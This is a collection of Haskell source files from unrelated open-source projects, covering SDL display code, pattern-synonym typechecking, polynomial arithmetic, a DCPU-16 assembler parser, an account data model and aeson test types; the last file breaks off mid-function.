-- the Screen. Note this also waits sufficient time for a frame to have elapsed.
update :: Tea s ()
update = do ts@(TS { _screen = (Screen x), _fpsCap = fps, _lastUpdate = last}) <- getT
t <- liftIO SDL.getTicks
liftIO $ do
when (fromIntegral t < last + fps) $ SDL.delay $ fromIntegral $ last + fps - fromIntegral t
SDL.tryFlip x
putT $ ts { _lastUpdate = fromIntegral t}
initialEventState = ES { keyCodes = listArray (minBound :: KeyCode, maxBound :: KeyCode) $ repeat False
, keysDown = 0
}
-- |Initialize hardware and run a Tea action with the specified state type.
runTea :: Int -- ^ Screen Width
-> Int -- ^ Screen Height
-> s -- ^ State data
-> Tea s m -- ^ Tea action
-> IO ()
runTea w h s m = do
SDL.init [SDL.InitEverything]
Mixer.openAudio 44100 Mixer.AudioS16Sys 2 1024
surf <- SDL.setVideoMode w h 0 [SDL.SWSurface]
let initialState = (TS (Screen surf) initialEventState (1000 `div` 60) 0 empty)
((v,s'), st') <- runStateT (runStateT (extractTea m) s) initialState
Mixer.closeAudio
SDL.quit
return ()
| liamoc/tea-hs | Tea/Display.hs | bsd-3-clause | 2,294 | 0 | 19 | 684 | 565 | 309 | 256 | 43 | 1 |
-- |
-- Module: FRP.Timeless.Framework.RPG.Render.Types
-- Copyright: (c) 2015 Rongcui Dong
-- License: BSD3
-- Maintainer: Rongcui Dong <karl_1702@188.com>
module FRP.Timeless.Framework.RPG.Render.Types
where
import qualified SDL as SDL
import Foreign.C.Types (CInt)
import Linear
import Linear.Affine
class RenderLayerClass r where
texture :: r -> SDL.Texture
-- | A existential type for polymorphic list
data RenderLayer = forall r . RenderLayerClass r => RenderLayer r
instance RenderLayerClass RenderLayer where
texture (RenderLayer l) = texture l
-- | A 'Camera' is just a rectangle of view inside the world
type Camera = Maybe (SDL.Rectangle CInt)
-- | A 'Projector' is basically the same as a 'Camera'
type Projector = Camera
data Scene = Scene
{
sceneLayers :: [RenderLayer]
, sceneCamera :: Camera
}
-- * Type related utilities
-- | Create a `SDL.Rectangle CInt`
cIntRect :: (Integral n) => Point V2 n -> V2 n -> SDL.Rectangle CInt
cIntRect pos@(P pv) size =
SDL.Rectangle (P $ fmap toCInt pv) (fmap toCInt size)
-- | Convert an `Integral` rectangle to `CInt`
toCRect :: (Integral n) => SDL.Rectangle n -> SDL.Rectangle CInt
toCRect (SDL.Rectangle pos size) = cIntRect pos size
-- | Convert to CInt
toCInt :: (Integral n) => n -> CInt
toCInt = fromIntegral
| carldong/timeless-RPG | src/FRP/Timeless/Framework/RPG/Render/Types.hs | bsd-3-clause | 1,320 | 0 | 9 | 253 | 315 | 176 | 139 | -1 | -1 |
module Zero.Account.Model
(
accountExists
, insertAccount
, deleteAccount
, getAccountById
, getAccountByEmail
, getVerificationStatusByEmail
, getVerificationCodeByEmail
) where
------------------------------------------------------------------------------
import Control.Monad (when, unless)
import qualified Data.Vector as V
import qualified Data.Text as T
import Zero.Persistence
import Zero.Account.Internal (Account(..), AccountStatus(..))
import Zero.Account.Relations
import Zero.Account.Verification.Internal (Verification(..), VerificationCode(..))
import Zero.Crypto (generateBytes, hexBS)
------------------------------------------------------------------------------
-- Model
------------------------------------------------------------------------------
-- | Checks whether an account exists
accountExists :: SessionId -> Connection -> Text -> IO (Bool)
accountExists sid conn s = do
maybeAccount <- getAccountByEmail sid conn s
case maybeAccount of
Just _ -> return True
Nothing -> return False
-- | Create a new account.
insertAccount :: SessionId -> Connection -> Account -> IO ()
insertAccount sid conn u@Account{..} = do
kA <- generateBytes 32
wrap_kB <- generateBytes 32
let accountAttributes' = attributesFromList (V.toList accountAttributes)
let accountTuples = mkTupleSetFromList accountAttributes' [
[ TextAtom a_userId
, TextAtom a_email
, TextAtom a_verifier
, TextAtom a_salt
, TextAtom $ hexBS kA
, TextAtom $ hexBS wrap_kB
] ]
case accountTuples of
Right tuples -> do
eRes <- executeDatabaseContextExpr sid conn (Insert "account" (MakeStaticRelation accountAttributes' tuples))
case eRes of
Left err ->
error $ show err
Right _ ->
return ()
Left err ->
error $ show err
-- | Deletes an account by its id.
deleteAccount sid conn userId = do
let p = AttributeEqualityPredicate "user_id#" (NakedAtomExpr (TextAtom userId))
let q = Delete "account" p
_ <- executeDatabaseContextExpr sid conn q
return ()
-- | Fetches an account by its Id.
getAccountById :: SessionId -> Connection -> Text -> IO (Maybe Account)
getAccountById sid conn uid = do
let p = AttributeEqualityPredicate "user_id#" (NakedAtomExpr (TextAtom uid))
let q = Restrict p (RelationVariable "account" ())
rel <- executeRelationalExpr sid conn q
case rel of
Left err ->
error $ show err
Right rl -> do
let accounts = accountsFromRelation rl
if not (null accounts) then
return $ Just $ head accounts
else
return Nothing
-- | Fetches an account by e-mail address.
getAccountByEmail :: SessionId -> Connection -> Text -> IO (Maybe Account)
getAccountByEmail sid conn email = do
let p = AttributeEqualityPredicate "email#" (NakedAtomExpr (TextAtom email))
let q = Restrict p (RelationVariable "account" ())
rel <- executeRelationalExpr sid conn q
case rel of
Left err ->
error $ show err
Right rl -> do
let accounts = accountsFromRelation rl
if not (null accounts) then
return $ Just $ head accounts
else
return Nothing
-- | Fetches the status of an account by e-mail address.
getVerificationStatusByEmail :: SessionId -> Connection -> Text -> IO (Maybe Verification)
getVerificationStatusByEmail sid conn email = do
let r = AttributeEqualityPredicate "email#" (NakedAtomExpr (TextAtom email))
let p = Project (convertAttributeNames accountVerificationAttributes) (Join accountRelationVar verificationRelationVar)
let q = Restrict r p
rel <- executeRelationalExpr sid conn q
case rel of
Left err ->
error $ show err
Right rl ->
return $ verificationStatusFromRelation rl
-- | Fetches the verification code associated with the supplied email address.
getVerificationCodeByEmail :: SessionId -> Connection -> Text -> IO (Maybe VerificationCode)
getVerificationCodeByEmail sid conn email = do
let r = AttributeEqualityPredicate "email#" (NakedAtomExpr (TextAtom email))
let p = Project (convertAttributeNames accountVerificationAttributes) (Join accountRelationVar verificationRelationVar)
let q = Restrict r p
rel <- executeRelationalExpr sid conn q
case rel of
Left err ->
error $ show err
Right rl ->
return $ verificationCodeFromRelation rl
| et4te/zero | server/src/Zero/Account/Model.hs | bsd-3-clause | 4,443 | 0 | 17 | 958 | 1,211 | 591 | 620 | -1 | -1 |
{-# LANGUAGE CPP #-}
-- #define DEBUG
{-# LANGUAGE TemplateHaskell #-}
{-|
Module : AERN2.Poly.Cheb.Ring
Description : Chebyshev basis ring operations
Copyright : (c) Michal Konecny
License : BSD3
Maintainer : mikkonecny@gmail.com
Stability : experimental
Portability : portable
Chebyshev basis ring operations
-}
module AERN2.Poly.Cheb.Ring
-- ( mulCheb, mulChebDirect, mulChebDCT )
where
#ifdef DEBUG
import Debug.Trace (trace)
#define maybeTrace trace
#else
#define maybeTrace ((flip const :: (String -> a -> a)))
#endif
import MixedTypesNumPrelude
-- import qualified Prelude as P
import Text.Printf
-- import Test.Hspec
-- import Test.QuickCheck
import AERN2.Normalize
-- import AERN2.MP.ErrorBound
import AERN2.MP.Ball
import AERN2.MP.Dyadic
-- import AERN2.Real
-- import AERN2.Interval
-- import AERN2.RealFun.Operations
-- import AERN2.RealFun.UnaryBallFun
import AERN2.Poly.Basics
import AERN2.Poly.Cheb.Type
import AERN2.Poly.Cheb.ShiftScale ()
import AERN2.Poly.Cheb.Maximum
import AERN2.Poly.Cheb.DCT
{- addition -}
instance
-- (PolyCoeffRing c, CanNormalize (ChPoly c))
(c ~ MPBall) =>
CanAddAsymmetric (ChPoly c) (ChPoly c)
where
type AddType (ChPoly c) (ChPoly c) = ChPoly c
add cp1@(ChPoly d1 p1 acG1 bnds1) cp2@(ChPoly d2 p2 acG2 bnds2)
| d1 == d2 =
result
-- case (chPolyBounds_valueIfConst bnds1, chPolyBounds_valueIfConst bnds2) of
-- (Just b1, _) -> b1 + cp2
-- (_, Just b2) -> cp1 + b2
-- _ -> result
| otherwise = error $ "Adding polynomials with incompatible domains"
where
acG = max acG1 acG2
result =
normalize $ ChPoly d1 (p1 + p2) acG (chPolyBounds_forChPoly result)
{- subtraction -}
instance
-- (PolyCoeffRing c, CanNormalize (ChPoly c)) =>
(c ~ MPBall) =>
CanSub (ChPoly c) (ChPoly c)
{- multiplication -}
instance
(c~MPBall) =>
CanMulAsymmetric (ChPoly c) (ChPoly c)
where
type MulType (ChPoly c) (ChPoly c) = ChPoly c
mul = mulChebNoBounds
mulChebUseBounds ::
-- (PolyCoeffBall c, CanNormalize (ChPoly c))
-- =>
(c~MPBall) =>
(ChPoly c) -> (ChPoly c) -> (ChPoly c)
mulChebUseBounds cp1@(ChPoly d1 _p1 _acG1 bnds1) cp2@(ChPoly d2 _p2 _acG2 bnds2)
| d1 == d2 =
case (chPolyBounds_valueIfConst bnds1, chPolyBounds_valueIfConst bnds2) of
(Just b1, _) -> b1 * cp2
(_, Just b2) -> cp1 * b2
_ -> updateRadius (+ e) resultC
| otherwise = error $ "Multiplying polynomials with incompatible domains"
where
resultC = mulChebNoBounds cp1C cp2C
(cp1C, e1) = centreAsBallAndRadius cp1
(cp2C, e2) = centreAsBallAndRadius cp2
(ChPolyBounds pmin1 pmax1) = bnds1
(ChPolyBounds pmin2 pmax2) = bnds2
bnd1 = errorBound $ (abs pmin1) `max` (abs pmax1)
bnd2 = errorBound $ (abs pmin2) `max` (abs pmax2)
e = e1 * bnd2 + e2 * bnd1 + e1 * e2
mulChebNoBounds ::
-- (PolyCoeffBall c, CanNormalize (ChPoly c))
-- =>
(c~MPBall) =>
(ChPoly c) -> (ChPoly c) -> (ChPoly c)
mulChebNoBounds p1@(ChPoly _ (Poly terms1) _acG1 _) p2@(ChPoly _ (Poly terms2) _acG2 _) =
maybeTrace
(printf "mulCheb: ac p1 = %s, ac p2 = %s, acG p1 = %s, acG p2 = %s, size1+size2 = %d, using %s, ac result = %s, prec result = %s"
(show $ getAccuracy p1) (show $ getAccuracy p2)
(show $ getAccuracyGuide p1) (show $ getAccuracyGuide p2)
(size1 + size2) methodS
(show $ getAccuracy result) (show $ getPrecision result)
) $
result
where
(result, methodS)
| getAccuracy p1 /= Exact || getAccuracy p2 /= Exact || size1 + size2 < 1000
-- TODO: improve the condition based on benchmarks
= (mulChebDirect p1 p2, "mulChebDirect")
| otherwise
= (mulChebDCT p1 p2, "mulChebDCT")
size1 = terms_size terms1
size2 = terms_size terms2
mulChebDirect ::
-- (PolyCoeffRing c, CanMulBy c Dyadic, CanNormalize (ChPoly c), CanSetPrecision c)
-- =>
(c~MPBall) =>
(ChPoly c) -> (ChPoly c) -> (ChPoly c)
mulChebDirect _cp1@(ChPoly d1 p1 acG1 _) _cp2@(ChPoly d2 p2 acG2 _)
| d1 /= d2 = error $ "Multiplying ChPoly values with incompatible domains"
| otherwise = result
where
result =
normalize $ ChPoly d1 (Poly terms) (max acG1 acG2) (chPolyBounds_forChPoly result)
terms =
terms_fromListAddCoeffs $
concat
[ let c = a*b*(dyadic 0.5) in [(i+j, c), (abs (i-j), c)]
|
(i,a) <- terms_toList terms1,
(j,b) <- terms_toList terms2
]
(Poly terms1) = p1 -- setPrecision prc p1
(Poly terms2) = p2 -- setPrecision prc p2
-- prc = (getPrecision p1) `max` (getPrecision p2) `max` (prec $ 2 `max` ((fromAccuracy (acG1 `min` acG2)) * deg))
-- deg = degree cp1 + degree cp2
mulChebDCT ::
-- (PolyCoeffBall c, CanNormalize (ChPoly c), CanSetPrecision c)
-- =>
(c~MPBall) =>
(ChPoly c) -> (ChPoly c) -> (ChPoly c)
mulChebDCT = lift2_DCT (+) (*)
{- integer power -}
{-TODO: Enable as soon as we have HasIntegers (ChPoly MPBall)
which will need convertExactlyFromSample.
instance
(c ~ MPBall) =>
CanPow (ChPoly c) Integer where
pow = powUsingMul
instance
(c ~ MPBall) =>
CanPow (ChPoly c) Int where
pow = powUsingMul
-}
| michalkonecny/aern2 | aern2-fun-univariate/src/AERN2/Poly/Cheb/Ring.hs | bsd-3-clause | 5,178 | 0 | 16 | 1,173 | 1,323 | 713 | 610 | -1 | -1 |
{-# LANGUAGE OverloadedStrings #-}
module Parser where
import Control.Applicative ((<*>), (<$>), (*>), (<*), (<|>), pure)
import qualified Data.Attoparsec.Text as P
import qualified Data.Attoparsec.Combinator as PC
import qualified Data.Text as T
import Data.Text (Text)
import Data.Word (Word16)
import Data.Char (isAlpha)
import qualified CommonTypes as CT
parse :: Text -> Program
parse text =
case P.feed (P.parse program text) T.empty of
P.Fail _ cs e -> error $ "Parsing failed because of: " ++ show e ++ ", at: " ++ show cs
P.Partial _ -> error "Parsing only partially finished!"
P.Done _ r -> r
program :: P.Parser Program
program = PC.manyTill line P.endOfInput
line :: P.Parser Line
line = PC.manyTill (skipWS *> statement) (P.endOfLine <|> P.endOfInput)
statement :: P.Parser Statement
statement = instruction
<|> nonBasicInstruction
<|> label
<|> comment
instruction :: P.Parser Statement
instruction = Instruction
<$> opcode
<*> (skipWS *> value)
<*> (P.char ',' *> skipWS *> value)
nonBasicInstruction :: P.Parser Statement
nonBasicInstruction = NonBasicInstruction
<$> nonBasicOpcode
<*> (skipWS *> value)
label :: P.Parser Statement
label = Label <$> (P.char ':' *> P.takeWhile1 isAlpha)
comment :: P.Parser Statement
comment = Comment <$> (P.char ';' *> skipWS *> P.takeTill P.isEndOfLine)
nonBasicOpcode :: P.Parser CT.NonBasicOpcode
nonBasicOpcode = P.string "JSR" *> pure CT.JSR
opcode :: P.Parser CT.Opcode
opcode = P.string "SET" *> pure CT.SET
<|> P.string "ADD" *> pure CT.ADD
<|> P.string "SUB" *> pure CT.SUB
<|> P.string "MUL" *> pure CT.MUL
<|> P.string "DIV" *> pure CT.DIV
<|> P.string "MOD" *> pure CT.MOD
<|> P.string "SHL" *> pure CT.SHL
<|> P.string "SHR" *> pure CT.SHR
<|> P.string "AND" *> pure CT.AND
<|> P.string "BOR" *> pure CT.BOR
<|> P.string "XOR" *> pure CT.XOR
<|> P.string "IFE" *> pure CT.IFE
<|> P.string "IFN" *> pure CT.IFN
<|> P.string "IFG" *> pure CT.IFG
<|> P.string "IFB" *> pure CT.IFB
value :: P.Parser Value
value = ramValue
<|> (Register <$> register)
<|> sp
<|> pc
<|> o
<|> pop
<|> peek
<|> push
<|> (Literal <$> literal)
<|> (LabelValue <$> labelText)
labelText :: P.Parser Text
labelText = P.takeWhile1 isAlpha
ramValue :: P.Parser Value
ramValue = RamValue <$> (P.char '[' *> skipWS *> ramAddress <* skipWS <* P.char ']')
ramAddress :: P.Parser RamAddress
ramAddress = (uncurry AtLiteralPlusReg <$> literalPlusReg)
<|> (AtRegister <$> register)
<|> (AtLiteral <$> literal)
<|> (AtLabel <$> labelText)
literalPlusReg :: P.Parser (Word16, CT.RegName)
literalPlusReg = ((,) <$> literal <*> (plus *> register))
<|> (swap <$> register <*> (plus *> literal))
where
swap rn l = (l, rn)
plus = skipWS *> P.char '+' *> skipWS
literal :: P.Parser Word16
literal = (P.string "0x" *> P.hexadecimal) <|> P.decimal
register :: P.Parser CT.RegName
register = P.char 'A' *> pure CT.A
<|> P.char 'B' *> pure CT.B
<|> P.char 'C' *> pure CT.C
<|> P.char 'X' *> pure CT.X
<|> P.char 'Y' *> pure CT.Y
<|> P.char 'Z' *> pure CT.Z
<|> P.char 'I' *> pure CT.I
<|> P.char 'J' *> pure CT.J
sp = P.string "SP" *> pure SP
pc = P.string "PC" *> pure PC
o = P.char 'O' *> pure O
pop = P.string "POP" *> pure POP
peek = P.string "PEEK" *> pure PEEK
push = P.string "PUSH" *> pure PUSH
skipWS = P.skipWhile P.isHorizontalSpace
ps parser str = P.feed (P.parse parser $ T.pack str) T.empty
type Program = [Line]
type Line = [Statement]
data Statement = Instruction CT.Opcode Value Value
| NonBasicInstruction CT.NonBasicOpcode Value
| Label Text
| Comment Text
deriving (Show)
data Value = RamValue RamAddress | Register CT.RegName | SP | PC | O
| POP | PEEK | PUSH | Literal Word16 | LabelValue Text
deriving (Show)
data RamAddress = AtLiteral Word16 | AtRegister CT.RegName | AtLabel Text
| AtLiteralPlusReg Word16 CT.RegName
deriving (Show)
| dan-t/dcpu16 | Parser.hs | bsd-3-clause | 4,448 | 0 | 35 | 1,280 | 1,558 | 798 | 760 | 113 | 3 |
{-# LANGUAGE DataKinds #-}
{-# LANGUAGE FlexibleContexts #-}
{-# LANGUAGE GADTs #-}
{-# LANGUAGE TypeOperators #-}
module Control.Eff.Select where
import Control.Eff
data Select x where
Select :: [a] -> Select a
select :: (Select :< effs) => [a] -> Eff effs a
select xs = eta (Select xs)
runSelect :: Eff (Select ': effs) a -> Eff effs [a]
runSelect = eliminate (\a -> pure [a]) (\(Select xs) k -> concat <$> mapM k xs)
| mitchellwrosen/effects-a-la-carte | src/Control/Eff/Select.hs | bsd-3-clause | 451 | 0 | 9 | 106 | 161 | 89 | 72 | 12 | 1 |
module Parse.Whitespace where
import AST.V0_16
import qualified Cheapskate.Types as Markdown
import qualified Data.Char as Char
import Parse.IParser
import qualified Parse.Markdown as Markdown
import qualified Parse.State as State
import qualified Reporting.Error.Syntax as Syntax
import Parse.ParsecAdapter hiding (newline, spaces, State)
padded :: IParser a -> IParser (C2 before after a)
padded p =
do pre <- whitespace
out <- p
post <- whitespace
return $ C (pre, post) out
spaces :: IParser Comments
spaces =
let
blank = string " " >> return []
comment = ((: []) <$> multiComment)
space =
blank
<|> (const [CommentTrickOpener] <$> (try $ string "{--}"))
<|> comment
<?> Syntax.whitespace
in
concat <$> many1 space
forcedWS :: IParser Comments
forcedWS =
choice
[ (++) <$> spaces <*> (concat <$> many nl_space)
, concat <$> many1 nl_space
]
where
nl_space =
try ((++) <$> (concat <$> many1 newline) <*> option [] spaces)
-- Just eats whitespace until the next meaningful character.
dumbWhitespace :: IParser Comments
dumbWhitespace =
concat <$> many (spaces <|> newline)
whitespace' :: IParser (Bool, Comments)
whitespace' =
option (False, []) ((,) True <$> forcedWS)
whitespace :: IParser Comments
whitespace =
snd <$> whitespace'
freshLine :: IParser Comments
freshLine =
concat <$> (try ((++) <$> many1 newline <*> many space_nl) <|> try (many1 space_nl)) <?> Syntax.freshLine
where
space_nl = try $ (++) <$> spaces <*> (concat <$> many1 newline)
newline :: IParser Comments
newline =
(simpleNewline >> return []) <|> ((\x -> [x]) <$> lineComment) <?> Syntax.newline
simpleNewline :: IParser ()
simpleNewline =
do _ <- try (string "\r\n") <|> string "\n"
updateState State.setNewline
return ()
trackNewline :: IParser a -> IParser (a, Multiline)
trackNewline parser =
do
updateState State.pushNewlineContext
a <- parser
state <- getState
updateState State.popNewlineContext
return (a, if State.sawNewline state then SplitAll else JoinAll)
lineComment :: IParser Comment
lineComment =
do _ <- try (string "--")
choice
[ const CommentTrickCloser
<$> try (char '}' >> many (char ' ') >> (simpleNewline <|> eof))
, do
(comment, ()) <-
anyUntil $ simpleNewline <|> eof
return $ LineComment comment
]
restOfLine :: IParser (Maybe String)
restOfLine =
many (char ' ') *>
choice
[ Just . fst <$> (try (string "--") *> (anyUntil $ (lookAhead simpleNewline) <|> eof))
, return Nothing
]
docComment :: IParser String
docComment =
do _ <- try (string "{-|")
_ <- many (string " ")
closeComment False
docCommentAsMarkdown :: IParser Markdown.Blocks
docCommentAsMarkdown =
Markdown.parse <$> docComment
multiComment :: IParser Comment
multiComment =
do _ <- try (string "{-" <* notFollowedBy (string "|") )
isCommentTrick <-
choice
[ char '-' >> return True
, return False
]
_ <- many (string " ")
b <- closeComment False
return $
if isCommentTrick then
CommentTrickBlock b
else
BlockComment $ trimIndent $ lines b
where
trimIndent [] = []
trimIndent (l1:ls) =
let
leadingIndents =
map fst $ filter (uncurry (/=))
$ map (\l -> (length $ takeWhile Char.isSpace l, length l)) ls
depth =
case leadingIndents of
[] -> 0
_ -> minimum leadingIndents
in
l1 : map (drop depth) ls
closeComment :: Bool -> IParser String
closeComment keepClosingPunc =
uncurry (++) <$>
anyUntil
(choice
[ try ((\a b -> if keepClosingPunc then concat (a ++ [b]) else "") <$> many (string " ") <*> string "-}") <?> "the end of a comment -}"
, concat <$> sequence [ try (string "{-"), closeComment True, closeComment keepClosingPunc]
])
anyUntil :: IParser a -> IParser (String, a)
anyUntil end =
go ""
where
next pre =
do
nextChar <- anyChar
go (nextChar : pre)
go pre =
((,) (reverse pre) <$> end) <|> next pre
| avh4/elm-format | elm-format-lib/src/Parse/Whitespace.hs | bsd-3-clause | 4,408 | 0 | 21 | 1,322 | 1,476 | 751 | 725 | 126 | 4 |
{-# LANGUAGE CPP #-}
{-# LANGUAGE DeriveDataTypeable #-}
{-# LANGUAGE DeriveGeneric #-}
{-# LANGUAGE FlexibleInstances #-}
{-# LANGUAGE GADTs #-}
{-# LANGUAGE GeneralizedNewtypeDeriving #-}
{-# LANGUAGE NoImplicitPrelude #-}
{-# LANGUAGE ScopedTypeVariables #-}
{-# LANGUAGE StandaloneDeriving #-}
module Types (module Types) where
import Prelude.Compat
import Math.NumberTheory.Logarithms (intLog2)
import Control.Applicative ((<$>))
import Data.Data
import Data.Functor.Compose (Compose (..))
import Data.Functor.Identity (Identity (..))
import Data.Hashable (Hashable (..))
#if !MIN_VERSION_base(4,16,0)
import Data.Semigroup (Option)
#endif
import Data.Text
import Data.Time (Day (..), fromGregorian)
import GHC.Generics
import Test.QuickCheck (Arbitrary (..), Property, counterexample, scale)
import qualified Data.Map as Map
import Data.Aeson
import Data.Aeson.Types
type I = Identity
type Compose3 f g h = Compose (Compose f g) h
type Compose3' f g h = Compose f (Compose g h)
data Foo = Foo {
fooInt :: Int
, fooDouble :: Double
, fooTuple :: (String, Text, Int)
-- This definition causes an infinite loop in genericTo and genericFrom!
-- , fooMap :: Map.Map String Foo
, fooMap :: Map.Map String (Text,Int)
} deriving (Show, Typeable, Data)
data UFoo = UFoo {
_UFooInt :: Int
, uFooInt :: Int
} deriving (Show, Eq, Data, Typeable)
data OneConstructor = OneConstructor
deriving (Show, Eq, Typeable, Data)
data Product2 a b = Product2 a b
deriving (Show, Eq, Typeable, Data)
data Product6 a b c d e f = Product6 a b c d e f
deriving (Show, Eq, Typeable, Data)
data Sum4 a b c d = Alt1 a | Alt2 b | Alt3 c | Alt4 d
deriving (Show, Eq, Typeable, Data)
class ApproxEq a where
(=~) :: a -> a -> Bool
newtype Approx a = Approx { fromApprox :: a }
deriving (Show, Data, Typeable, ApproxEq, Num)
instance (ApproxEq a) => Eq (Approx a) where
Approx a == Approx b = a =~ b
data Nullary = C1 | C2 | C3 deriving (Eq, Show)
data SomeType a = Nullary
| Unary Int
| Product String (Maybe Char) a
| Record { testOne :: Double
, testTwo :: Maybe Bool
, testThree :: Maybe a
}
| List [a]
deriving (Eq, Show)
-- | This type requires IncoherentInstances for the instances of the type
-- classes Data.Aeson.TH.LookupField and Data.Aeson.Types.FromJSON.FromRecord.
--
-- The minimum known requirements for this type are:
-- * Record type with at least two fields
-- * One field type is either a type parameter or a type/data family
-- * Another field type is a @Maybe@ of the above field type
data IncoherentInstancesNeeded a = IncoherentInstancesNeeded
{ incoherentInstancesNeededMaybeNot :: a
, incoherentInstancesNeededMaybeYes :: Maybe a
} deriving Generic
-- Used for testing UntaggedValue SumEncoding
data EitherTextInt
= LeftBool Bool
| RightInt Int
| BothTextInt Text Int
| NoneNullary
deriving (Eq, Show)
data GADT a where
GADT :: { gadt :: String } -> GADT String
deriving Typeable
deriving instance Data (GADT String)
deriving instance Eq (GADT a)
deriving instance Show (GADT a)
newtype MaybeField = MaybeField { maybeField :: Maybe Int }
#if !MIN_VERSION_base(4,16,0)
newtype OptionField = OptionField { optionField :: Option Int }
deriving (Eq, Show)
#endif
deriving instance Generic Foo
deriving instance Generic UFoo
deriving instance Generic OneConstructor
deriving instance Generic (Product2 a b)
deriving instance Generic (Product6 a b c d e f)
deriving instance Generic (Sum4 a b c d)
deriving instance Generic (Approx a)
deriving instance Generic Nullary
deriving instance Generic (SomeType a)
deriving instance Generic1 SomeType
#if !MIN_VERSION_base(4,16,0)
deriving instance Generic OptionField
#endif
deriving instance Generic EitherTextInt
failure :: Show a => String -> String -> a -> Property
failure func msg v = counterexample
(func ++ " failed: " ++ msg ++ ", " ++ show v) False
newtype BCEDay = BCEDay Day
deriving (Eq, Show)
zeroDay :: Day
zeroDay = fromGregorian 0 0 0
instance Arbitrary BCEDay where
arbitrary = fmap (BCEDay . ModifiedJulianDay . (+ toModifiedJulianDay zeroDay)) arbitrary
instance ToJSON BCEDay where
toJSON (BCEDay d) = toJSON d
toEncoding (BCEDay d) = toEncoding d
instance FromJSON BCEDay where
parseJSON = fmap BCEDay . parseJSON
-- | Scale the size of Arbitrary with ''
newtype LogScaled a = LogScaled { getLogScaled :: a }
deriving (Eq, Ord, Show)
instance Hashable a => Hashable (LogScaled a) where
hashWithSalt salt (LogScaled a) = hashWithSalt salt a
instance Arbitrary a => Arbitrary (LogScaled a) where
arbitrary = LogScaled <$> scale (\x -> intLog2 $ x + 1) arbitrary
shrink = fmap LogScaled . shrink . getLogScaled
instance ToJSON a => ToJSON (LogScaled a) where
toJSON (LogScaled d) = toJSON d
toEncoding (LogScaled d) = toEncoding d
instance FromJSON a => FromJSON (LogScaled a) where
parseJSON = fmap LogScaled . parseJSON
instance (ToJSONKey a) => ToJSONKey (LogScaled a) where
toJSONKey = contramapToJSONKeyFunction getLogScaled toJSONKey
toJSONKeyList = contramapToJSONKeyFunction (fmap getLogScaled) toJSONKeyList
instance (FromJSONKey a) => FromJSONKey (LogScaled a) where
fromJSONKey = fmap LogScaled fromJSONKey
fromJSONKeyList = coerceFromJSONKeyFunction (fromJSONKeyList :: FromJSONKeyFunction [a])
| dmjio/aeson | tests/Types.hs | bsd-3-clause | 5,606 | 1 | 11 | 1,242 | 1,549 | 867 | 682 | 124 | 1 |
{-
(c) The University of Glasgow 2006
(c) The GRASP/AQUA Project, Glasgow University, 1992-1998
\section[TcPatSyn]{Typechecking pattern synonym declarations}
-}
{-# LANGUAGE CPP #-}
module TcPatSyn ( tcInferPatSynDecl, tcCheckPatSynDecl
, tcPatSynBuilderBind, tcPatSynBuilderOcc, nonBidirectionalErr
) where
import HsSyn
import TcPat
import TcRnMonad
import TcEnv
import TcMType
import TysPrim
import TypeRep
import Name
import SrcLoc
import PatSyn
import NameSet
import Panic
import Outputable
import FastString
import Var
import Id
import IdInfo( IdDetails(..), RecSelParent(..))
import TcBinds
import BasicTypes
import TcSimplify
import TcUnify
import TcType
import TcEvidence
import BuildTyCl
import VarSet
import MkId
import VarEnv
import Inst
import TcTyDecls
import ConLike
import FieldLabel
#if __GLASGOW_HASKELL__ < 709
import Data.Monoid
#endif
import Bag
import Util
import Data.Maybe
import Control.Monad (forM)
#include "HsVersions.h"
{-
************************************************************************
* *
Type checking a pattern synonym
* *
************************************************************************
-}
tcInferPatSynDecl :: PatSynBind Name Name
-> TcM (PatSyn, LHsBinds Id, TcGblEnv)
tcInferPatSynDecl PSB{ psb_id = lname@(L loc name), psb_args = details,
psb_def = lpat, psb_dir = dir }
= setSrcSpan loc $
do { traceTc "tcInferPatSynDecl {" $ ppr name
; tcCheckPatSynPat lpat
; let (arg_names, rec_fields, is_infix) = collectPatSynArgInfo details
; ((lpat', (args, pat_ty)), tclvl, wanted)
<- pushLevelAndCaptureConstraints $
do { pat_ty <- newFlexiTyVarTy openTypeKind
; tcPat PatSyn lpat pat_ty $
do { args <- mapM tcLookupId arg_names
; return (args, pat_ty) } }
; let named_taus = (name, pat_ty) : map (\arg -> (getName arg, varType arg)) args
; (qtvs, req_dicts, ev_binds) <- simplifyInfer tclvl False [] named_taus wanted
; (ex_vars, prov_dicts) <- tcCollectEx lpat'
; let univ_tvs = filter (not . (`elemVarSet` ex_vars)) qtvs
ex_tvs = varSetElems ex_vars
prov_theta = map evVarPred prov_dicts
req_theta = map evVarPred req_dicts
; traceTc "tcInferPatSynDecl }" $ ppr name
; tc_patsyn_finish lname dir is_infix lpat'
(univ_tvs, req_theta, ev_binds, req_dicts)
(ex_tvs, map mkTyVarTy ex_tvs, prov_theta, emptyTcEvBinds, prov_dicts)
(zip args $ repeat idHsWrapper)
pat_ty rec_fields }
tcCheckPatSynDecl :: PatSynBind Name Name
-> TcPatSynInfo
-> TcM (PatSyn, LHsBinds Id, TcGblEnv)
tcCheckPatSynDecl PSB{ psb_id = lname@(L loc name), psb_args = details,
psb_def = lpat, psb_dir = dir }
TPSI{ patsig_tau = tau,
patsig_ex = ex_tvs, patsig_univ = univ_tvs,
patsig_prov = prov_theta, patsig_req = req_theta }
= setSrcSpan loc $
do { traceTc "tcCheckPatSynDecl" $
ppr (ex_tvs, prov_theta) $$
ppr (univ_tvs, req_theta) $$
ppr arg_tys $$
ppr tau
; tcCheckPatSynPat lpat
; req_dicts <- newEvVars req_theta
-- TODO: find a better SkolInfo
; let skol_info = SigSkol (PatSynCtxt name) (mkFunTys arg_tys pat_ty)
; let (arg_names, rec_fields, is_infix) = collectPatSynArgInfo details
; let ty_arity = length arg_tys
; checkTc (length arg_names == ty_arity)
(wrongNumberOfParmsErr ty_arity)
-- Typecheck the pattern against pat_ty, then unify the type of args
-- against arg_tys, with ex_tvs changed to SigTyVars.
-- We get out of this:
-- * The evidence bindings for the requested theta: req_ev_binds
-- * The typechecked pattern: lpat'
-- * The arguments, type-coerced to the SigTyVars: wrapped_args
-- * The instantiation of ex_tvs to pass to the success continuation: ex_tys
-- * The provided theta substituted with the SigTyVars: prov_theta'
; (implic1, req_ev_binds, (lpat', (ex_tys, prov_theta', wrapped_args))) <-
buildImplication skol_info univ_tvs req_dicts $
tcPat PatSyn lpat pat_ty $ do
{ ex_sigtvs <- mapM (\tv -> newSigTyVar (getName tv) (tyVarKind tv)) ex_tvs
; let subst = mkTvSubst (mkInScopeSet (zipVarEnv ex_sigtvs ex_sigtvs)) $
zipTyEnv ex_tvs (map mkTyVarTy ex_sigtvs)
